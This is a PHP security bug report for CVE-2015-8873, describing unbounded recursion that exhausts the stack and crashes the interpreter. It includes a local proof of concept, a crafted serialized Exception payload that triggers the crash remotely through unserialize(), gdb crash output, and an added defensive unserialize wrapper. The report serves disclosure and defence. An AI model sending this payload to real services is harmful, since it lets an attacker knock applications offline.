CVE-2015-8873: Remotely triggerable stack exhaustion via recursive method calls
Stack consumption vulnerability in Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to cause a denial of service (segmentation fault) via recursive method calls.
Sec Bug #69793
Remotely triggerable stack exhaustion via recursive method calls
Submitted:
2015-06-10 16:42 UTC
Modified:
2015-08-04 22:20 UTC
From:
andrea dot palazzo at truel dot it
Assigned:
Status:
Closed
Package:
Class/Object related
PHP Version:
Irrelevant
OS:
Ubuntu x86_64
Private report:
No
CVE-ID:
None
[2015-06-10 16:42 UTC] andrea dot palazzo at truel dot it
Description:
Hello guys, I marked this one as “security” because the crash is remotely triggerable (via unserialize()), so I thought you might not want it public; it doesn’t seem to be exploitable, though.
The problem lies in how recursive method calls are handled: the number of nested calls a method can perform to itself doesn’t seem to be limited, causing an infinite recursion that results in an invalid memory read access due to stack exhaustion.
The POC is trivial:
<?php
class Dummy {
    public function recursion() { $this->recursion(); }
}
$x = new Dummy; $x->recursion();
?>
(gdb) r rec.php
Starting program: /usr/bin/php rec.php

Program received signal SIGSEGV, Segmentation fault.
zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h:592
592 in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h
Unfortunately, this is also triggerable remotely by crafting a special serialized object, using only built-in classes, like:
<?php
$e = unserialize('O:9:"Exception":7:{s:17:"'."\0".'Exception'."\0".'string";s:1:"a";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";R:1;s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";i:10;s:10:"'."\0".'*'."\0".'message";N;}');
var_dump($e."");
?>
(gdb) r exception.php
Starting program: /usr/bin/php exception.php

Program received signal SIGSEGV, Segmentation fault.
zend_parse_va_args (num_args=num_args@entry=0, type_spec=0xb0776b "", va=va@entry=0x7fffff7ff058, flags=flags@entry=0) at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c:827
827 in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c
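The remote variant only works because attacker-controlled bytes reach unserialize() and are allowed to instantiate a class. The wrapper below is an added defensive example (not code from the report or from PHP's own fix; `safe_unserialize` and both sample inputs are constructed here): it rejects any serialized object before the bytes reach unserialize(), and on PHP 7+ additionally asks the engine to refuse class instantiation.

```php
<?php
// Added example, not part of the bug report or of PHP itself.
// Untrusted serialized data must never be allowed to build live objects:
// that is the step which lets the crafted Exception above into the engine.

function safe_unserialize($data)
{
    if (!is_string($data)) {
        return false;
    }
    // Structural pre-check that also works on PHP 5.x: object tokens (O:, C:)
    // can only appear at the start of the payload or right after ';', '{' or '}'.
    // A string value that happens to contain ';O:1:"' is rejected too; that is
    // an acceptable false positive for input that should carry no objects at all.
    if (preg_match('/(^|[;{}])[OC]:\d+:"/', $data)) {
        return false;
    }
    if (PHP_VERSION_ID >= 70000) {
        // PHP >= 7.0 can enforce the same rule in the engine: any object token
        // becomes a __PHP_Incomplete_Class instead of a live instance.
        return unserialize($data, array('allowed_classes' => false));
    }
    return unserialize($data);
}

// Constructed inputs: a plain array is accepted, while a payload shaped like
// the report's crafted Exception is refused before unserialize() ever runs.
$benign  = serialize(array('user' => 'alice', 'roles' => array('reader')));
$crafted = 'O:9:"Exception":1:{s:17:"' . "\0" . 'Exception' . "\0" . 'string";s:1:"a";}';

var_dump(safe_unserialize($benign) !== false);
var_dump(safe_unserialize($crafted) === false);
```

For data that only ever needs scalars and arrays, json_decode() avoids the object-instantiation problem entirely and is the simpler choice.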
History
[2015-08-04 22:22 UTC] [email protected]
-Status: Open
+Status: Closed